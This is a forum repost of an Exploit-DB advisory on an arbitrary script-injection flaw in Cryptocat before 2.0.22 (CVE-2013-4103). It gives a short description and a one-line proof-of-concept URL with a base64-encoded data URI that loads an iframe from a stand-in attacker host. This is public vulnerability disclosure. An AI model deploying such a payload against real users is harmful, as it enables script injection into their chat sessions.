Exploit Cryptocat 2.0.22 - Arbitrary Script Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
38637
Проверка EDB
  1. Пройдено
Автор
MARIO HEIDERICH
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
cve-2013-4103
Дата публикации
2012-11-07
Cryptocat 2.0.22 - Arbitrary Script Injection
Код:
source: https://www.securityfocus.com/bid/61093/info

Cryptocat is prone to an arbitrary script-injection vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this issue to execute arbitrary script code within the context of the application.

Versions prior to Cryptocat 2.0.22 are vulnerable. 

Http://example.come/data:image/foo;base64,PGh0bWw+PGlmcmFtZSBzcmM9Imh0dHA6Ly9ldmlsLmNvbS8iPjwvaWZyYW1lPjwvaHRtbD4NCg
 
Источник
www.exploit-db.com

Похожие темы